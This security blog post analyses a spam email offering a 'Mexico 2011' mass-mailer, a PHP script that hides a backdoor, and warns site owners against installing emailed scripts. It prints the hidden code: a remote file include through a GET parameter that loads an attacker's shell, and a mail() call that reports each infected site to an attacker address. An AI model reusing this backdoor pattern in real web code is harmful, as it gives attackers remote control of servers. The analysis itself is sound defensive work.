Categorized | Security

Email with offer for ‘Base de datos Mexico 2011′ contains PHP exploit

MX Lab, http://www.mxlab.eu, started to intercept an interesting exploit based on PHP. The email comes in with the subject “Mexico 2011″ and is send from the spoofed address “noreply@prodigy.net.mx” and has the following body:

Attached to the message is a small ZIP file named Mbeta.zip. Once extracted you will have a folder “mailer” two files inside: Mh.php and Tutorial.txt.

This is the content of the tutorial:

TUTORIAL: descomprime el archivo
1* Guardar el archivo Mh.php (Mailer) en su pc.
2* LO suben a su hosting por FTP
3*Una vez subido al hosting entrar desde la web ej www.sudominio.com/Mh.php
4*Este es la version beta con limitaciones, la version full se vende en el pack.
emaileficaz@yahoo.com

Translated:

TUTORIAL: unzip the file
1* Save the file Mh.php (Mailer) on your pc
2* Load up to your FTP hosting
3*Once this is done visit your web site at www.sudominio.com/Mh.php
4*This is the beta version with limitations, the full version is sold in the pack.
emaileficaz@yahoo.com

When you open the PHP on a web server you will have the following webform:

MX Lab has analyzed the PHP code that was present in the document and it appears to be some kind of PHP script to send out a mass mailing but it also contains some additional code to detect certain possibilities to find an exploit on your web server.

if (trim($ _GET['x'])!=”){@include($ _GET['x']);exit();}$ email = ‘hatuey30@hotmail.com’;$ y = ‘http://’ . $ _SERVER['HTTP_HOST'] . $ _SERVER['REQUEST_URI'];@mail($ email, ‘Exploit: ‘. $ _SERVER['PHP_SELF'], ‘Hey , this is a new victim\’s exploit: ‘. $ y .’\n\n You can use (x=shell_url) at the end of the link ;) ‘, ‘From: ‘. $ email .’ <’. $ email .’>\r\n’);

This particular code will check your web server and sends what it has found by email to an email address, in this case hatuey30@hotmail.com.

We have replaced the address by our own address and have removed the mass mailing feature just to test. The email that we got is:

Hey , this is a new victim’s exploit: http://www.mydomain.com/Mh.php\n\n You can use (x=shell_url) at the end of the link

It is clear that with this PHP technique, your web server is at risk in a certain way. So don’t be fooled by offers that sound too good to be true and in any way do not install any scripts, wether it is PHP, ASP or Coldfusion, on your web server or shared hosting server that are sent by email.

Related Posts

Comments are closed.

Security Status

Beware Facebook "Timeline" scams http://t.co/W5EW0cVv
5 months ago
Nigerian government (unknowingly) hosts phishing website http://t.co/uQd42ENw
5 months ago
PCMag Awards McAfee All Access its Editors’ Choice: SANTA CLARA, Calif.--(BUSINESS WIRE)--McAfee today announced... http://t.co/FakV7Vd8
5 months ago
RT @mikko: I hadn't noticed Google Maps has added 3D models of buildings. Here's a (very accurate) view of F-Secure HQ in Helsinki http://t.co/IKfAZlak
5 months ago
North Koreans aren't known for their online presence. But others may be lured into clicking Kim Jong-Il 'videos' too http://t.co/yQOon6YT
5 months ago
How to Protect Your Professional Reputation on Facebook Timeline http://t.co/I4bcR2VN
5 months ago
This is pretty impressive from @Softpedia: Facebook scans 2 trillion link clicks and blocks 220 million posts each day http://t.co/vKsn9gNl
5 months ago
Need for integrated approach to security in industrial control systems - http://t.co/tPBCNOow with @PikeResearch
5 months ago
Some free-based music we play at work http://t.co/xu5agZfc
5 months ago
Japan’s cyber defense weapon: a virus. It includes quotes by @Luis_Corrons via @InfosecurityMag
5 months ago